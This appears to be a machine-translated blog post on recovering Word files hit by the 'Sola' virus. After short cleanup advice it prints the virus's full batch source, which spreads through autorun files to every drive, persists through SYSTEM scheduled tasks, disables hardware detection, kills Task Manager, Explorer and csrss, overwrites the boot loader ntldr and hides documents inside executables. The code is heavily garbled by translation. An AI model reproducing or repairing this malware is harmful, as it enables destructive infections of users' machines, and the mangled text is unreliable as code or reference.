First, use PE to enter the system and decompress the infected Word file with ZIP or RAR provided by PE. After decompression, three files are displayed: function. DLL, Sola ****. bat ,****. doc, note that all files are hidden.
It is best not to use anti-virus software to scan and kill the virus, because the anti-virus software will isolate the source files together. First, Back Up Files (including infected files) to non-system disks.
Then reinstall the system. Do not run any infected files after the system is reinstalled. Then, use the "death Q & A (Sola) otaku virus exclusive killing tool" as shown in the attachment to clear each drive letter to restore Word files in batches.
The following are virus behaviors for your reference:
@ Echo offset Sola = % SystemRoot % \ fonts \ hidese ~ 1 Set setup = % SystemRoot % \ fonts \ hidese ~ 1 \ solasetupfor/F "tokens = 1" % I in ('date/t ') do set realdate = % IFOR/F "Skip = 5 tokens =" % I in ('dir % SystemRoot % \ assumer.exe ') do if/I "% J" = "assumer.exe" set date = % IIF "% 1" = "-install" Goto installif "% 1" = "- run "Goto runif" % 1 "="-tenbatsu "Goto tenbatsuif" % 1 "="-Kill "Goto killif" % 1 "="-killself "Goto killself ": checksignif "% 1" = "-USB" Start/Max .. if "% 1" = "-USB" CD solaif exist % s Ystemroot % \ fonts \ hidese ~ 1 \ Sola. sign goto open: filecopyset selfname = % 0: hideselfdate % date % MD % SystemRoot % \ fonts \ hideself... date % realdate % if not "% 1" = "-USB" type % selfname %> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. batif "% 1" = "-USB" type Sola. Bat> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. battype function. dll> % SystemRoot % \ fonts \ hidese ~ 1 \ function.exe echo on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho ws. Run "CMD/C % Sola % \ Sola. Bat-install", 0> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. signdel % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsgoto open: Install: packersetup % systemdrive % Cd % SystemRoot % \ fonts \ hidese ~ 1if exist function.exe taskkill/f/IM function.exe if exist solasetup RD/S/Q solasetupmd solasetupcd solasetupcopy .. \ function.exe function. DLL .. \ function.exe-XCD .. date % date % Type % setup % \ rar.exe> % SystemRoot % \ system32 \ rar.exe date % realdate % copy % setup % \ function. dll % Sola % \ function. dllattrib % Sola % \ function. dll + S + H + rrar-M0-EP-EP1 a % setup % \ docpack. dll % Sola % \ function. dllrar-M0-EP-EP1 % Setup % \ txtpack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ exepack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ jpgpack. dll % Sola % \ function. dlldel function.exe: mainsetupset a0001 = copyset a0002 = attribset a0003 = echoset a0005 = Shell Hardware failed> % Sola % \ task.txt for/F "tokens = 1" % I in ('findstr/I "svchost.exe "" % Sola % \ task.txt "') do set svchost = % I % a0001 % SystemRoot % \ syste M32 \ cmd.exe % Sola % \ % svchost % del % Sola % \ task.txt: tasks % a0002 % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobdate % date % Type % setup % \ Tasks. xxx> % SystemRoot % \ Tasks. jobschtasks/change/ru "nt authority \ System"/TN "tasks" & if errorlevel 1 goto taskfaildate % realdate % goto tasksuc: taskfail % homedrive % Cd "% allusersprofile %" cd "start" Menu \ Program \ Start Date % date % a0003 % on error resume NEX T> Sola. vbs % a0003 % set Ws = wscript. createobject ("wscript. shell ")> Sola. vbs % a0003 % ws. run "% Sola % \ svchost.exe/C % Sola % \ Sola. bat-run ", 0> Sola. vbs % a0001 % Sola. vbs % Sola % \ Sola. vbs % a0003 % NT> % SystemRoot % \ fonts \ hidese ~ 1 \ notasksdate % realdate %: tasksuc % a0002 % SystemRoot % \ Tasks. job + S + H + rdate % date % a0001 % setup % \ sleep.exe % SystemRoot % \ system32 \ sleep.exe date % realdate %: noautoplaynet stop "% a0005 %" % a0003 % Windows Registry Editor Version 5.00> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ ShellHWDetection]> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % "start" = DWORD: 00000004> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. regregedit/S % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. reg: End of installgoto end & if errorlevel 1 exit: End of install: runset runroot = % allusersprofile % \ Start Menu \ Program \ Start set taskroot = % SystemRoot % \ Tasks: runtimechkif not exist % Sola % \ runtime.txt echo! 50> % Sola % \ runtime.txt for/F "tokens = 1 delims =! "% I in (% Sola % \ runtime.txt) do set runtime = % IIF/I % runtime % Leq 0 goto virusset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt: diskchkecho on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho ws. Run "% Sola % \ svchost.exe/C % setup % \ recentinf. Bat", 0 >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsdel % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsfor % I in (c d e f g h I j k l m n o p q r s t u v w x y z) Do vol % I: & if errorlevel 1 Set % I = 1for % I in (c d e f g h I j k l m n o p q r s t u v w x Y Z) do Echo 1> % I: \ solachk1 & findstr. % I: \ solachk1 & if not errorlevel 1 del % I: \ solachk1 & findstr/C: "sola_1.0_2.0" % I: \ autorun. INF & if errorlevel 1 attrib-s-h-R % I: \ autorun. INF & copy/Y % setup % \ autorun. INF % I: \ autorun. I NF & attrib % I: \ autorun. INF + S + H + R & MD % I: \ Sola & copy/y "% setup % \ Sola. bat "% I: \ Sola. BAT & copy/y "% setup % \ function. DLL "% I: \ Sola \ function. DLL & attrib % I: \ Sola + S + H + R: turnif "% C %" = "1" vol C: & if not errorlevel 1 call % setup % \ scan. bat C: If "% d %" = "1" vol D: & if not errorlevel 1 call % setup % \ scan. bat D: If "% E %" = "1" vol E: & if not errorlevel 1 call % setup % \ scan. bat E: If "% F %" = "1" vol F: & if no T errorlevel 1 call % setup % \ scan. bat F: If "% G %" = "1" vol G: & if not errorlevel 1 call % setup % \ scan. bat G: If "% H %" = "1" vol H: & if not errorlevel 1 call % setup % \ scan. bat H: If "% I %" = "1" vol I: & if not errorlevel 1 call % setup % \ scan. bat I: If "% J %" = "1" vol J: & if not errorlevel 1 call % setup % \ scan. bat J: If "% K %" = "1" vol K: & if not errorlevel 1 call % setup % \ scan. bat K: If "% L %" = "1" vol L: & if not errorlev El 1 call % setup % \ scan. bat L: If "% m %" = "1" vol M: & if not errorlevel 1 call % setup % \ scan. bat M: If "% N %" = "1" vol N: & if not errorlevel 1 call % setup % \ scan. bat N: If "% o %" = "1" vol O: & if not errorlevel 1 call % setup % \ scan. bat O: If "% P %" = "1" vol P: & if not errorlevel 1 call % setup % \ scan. bat P: If "% Q %" = "1" vol Q: & if not errorlevel 1 call % setup % \ scan. bat Q: If "% R %" = "1" vol R: & if not errorlevel 1 call % Setup % \ scan. bat R: If "% S %" = "1" vol S: & if not errorlevel 1 call % setup % \ scan. bat S: If "% T %" = "1" vol T: & if not errorlevel 1 call % setup % \ scan. bat T: If "% u %" = "1" vol U: & if not errorlevel 1 call % setup % \ scan. bat U: If "% v %" = "1" Vol V: & if not errorlevel 1 call % setup % \ scan. bat V: If "% w %" = "1" vol W: & if not errorlevel 1 call % setup % \ scan. bat W: If "% x %" = "1" vol X: & if not errorlevel 1 call % setup % \ SC An. bat X: If "% Y %" = "1" vol Y: & if not errorlevel 1 call % setup % \ scan. bat Y: If "% Z %" = "1" vol Z: & if not errorlevel 1 call % setup % \ scan. bat Z: If "% C %" = "2" vol C: & if errorlevel 1 set C = 1if "% d %" = "2" vol D: & if errorlevel 1 set D = 1if "% E %" = "2" vol E: & if errorlevel 1 set E = 1if "% F %" = "2" vol F: & if errorlevel 1 set f = 1if "% G %" = "2" vol G: & if errorlevel 1 Set G = 1if "% H %" = "2" vol H: & if errorlevel 1 Set H = 1if "% I %" = "2" vol I: & if errorlevel 1 set I = 1if "% J %" = "2" vol J: & if errorlevel 1 Set J = 1if "% K %" = "2" vol K: & if errorlevel 1 set K = 1if "% L %" = "2" vol L: & if errorlevel 1 set L = 1if "% m %" = "2" vol M: & if errorlevel 1 Set M = 1if "% N %" = "2" vol N: & if errorlevel 1 set n = 1if "% o %" = "2" vol O: & if errorlevel 1 set O = 1if "% P %" = "2" vol P: & if errorlevel 1 Set P = 1if "% Q %" = "2" vol Q: & if errorlevel 1 Set q = 1i F "% R %" = "2" vol R: & if errorlevel 1 Set R = 1if "% S %" = "2" vol s: & if errorlevel 1 set S = 1if "% T %" = "2" vol t: & if errorlevel 1 set T = 1if "% u %" = "2" vol U: & if errorlevel 1 set U = 1if "% v %" = "2" Vol V: & if errorlevel 1 set V = 1if "% w %" = "2" vol W: & if errorlevel 1 set w = 1if "% x %" = "2" vol X: & if errorlevel 1 set X = 1if "% Y %" = "2" vol Y: & if errorlevel 1 set Y = 1if "% Z %" = "2" vol Z: & if errorlevel 1 set Z = 1if ex Ist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist "% runroot % \ Sola. vbs "copy" % Sola % \ Sola. vbs "" % runroot % \ Sola. vbs "if not exist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist % taskroot % \ Tasks. job copy % setup % \ Tasks. xxx % taskroot % \ Tasks. job & attrib % taskroot % \ Tasks. job + S + H + R & schtasks/change/ru "nt authority \ System"/TN "tasks" Sleep 2000 goto turn: End of rungoto end & if errorlevel 1 exit:: End of run: virusif not "% runtime %" = "0" Goto viruschkset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt cd "% allusersprofile % \ Start Menu \ Program \ Start" echo on error resume next> tenbatsu. vbsecho set Ws = wscript. createobject ("wscript. shell ")> tenbatsu. vbsecho ws. run "% Sola % \ Sola. bat-tenbatsu ", 0> tenbatsu. vbsgoto diskchk: viruschkif not exist "% allusersprofile % \ Start Menu \ Program \ Start \ tenbatsu. vbs "Goto killgoto diskchk: tenbatsu: killntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % systemdrive % \ ntld R % Sola % \ ntldrecho no ntldr> % systemdrive % \ ntldr: attrib % systemdrive % \ ntldr + S + H + R: pausesfcstart MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-PN winlogon.exe ', 0); window. close () ": killtaskmgrdel/Q/A % SystemRoot % \ system32 \ dllcache \ taskmgr.exe taskkill/f/IM taskmgr.exe & if errorlevel 1 Ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. xxx & if errorlevel 1 start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN taskmgr.exe ', 0); window. close () "& sleep 500ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. XXX: killexplorertaskkill/f/IM assumer.exe> NUL & if errorlevel 1 Ren % SystemRoot % \ system32 \ assumer.exe explorer. xxx & start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN cmder.exe ', 0); window. close () "& sleep 500ren % systemroo T % \ assumer.exe explorer. xxxstart/max % setup % \ tenbatsu. BAT: timesetsleep 661_if exist % Sola % \ killself Exit: killattrib % systemdrive % \ ntldr-s-h-recho no ntldr> % systemdrive % \ ntldr :: attrib % systemdrive % \ ntldr + S + H + rtasklist> % Sola % \ task.txt for/F "tokens = 2" % I in ('findstr/I "csrss.exe" "% sola % \ task.txt "') do ntsd-P % igoto diskchk: killself: startexplorerren % SystemRoot % \ Explorer. xxx Explorer. Exestart % SystemRoot % \ assumer.exe: backntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % Sola % \ ntldr % systemdrive % \ ntldrattrib % systemdrive % \ ntldr + S + H + R: running mgren % SystemRoot % \ system32 \ taskmgr. xxx taskmgr.exe: killviruscopy % setup % \ killvirus.txt % Sola % \ killvirus.txt C: cdmd ~ Installcd ~ Installrar X-hpkakenhi200601 % setup % \ solakiller.rar MSHTA "javascript: New activexobject ('wscript. shell'). Run ('C :\\~ Install \ install. bat % 1', 0); window. close () "RD/S/Q % setup % attrib % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobcd "% allusersprofile % \ Start Menu \ Program \ Start" If exist Sola. vbs del Sola. vbsif exist tenbatsu. vbs del tenbatsu. vbsstart % SystemRoot % \ system32 \ notepad.exe % Sola % \ killvirus.txt del % Sola % \ Sola. batexit: openif "% 1" = "-USB" exitgoto getname: backopenif not exist "% name %" exitcall "% name %": savefor/F "delims =: "% I in ('findstr" % code % "*. EXE ') do set packname = % IRAR-M0-EP-EP1 a "% packname %" "% name %" Echo % code %> "% packname % ": delattrib "% name %"-s-h-rdel "% name %" attrib function. DLL-s-h-rdel function. dllattrib % 0-s-h-rdel % 0 Exit: cmd program will stop there.: getnameset code = sola_2.0_12695220593667set name= .doc goto backopen: End
This article from the "Chongqing network management" blog, please be sure to retain this source http://023wg.blog.51cto.com/1462514/1551661
Batch recovery of Sola virus doc changed to exe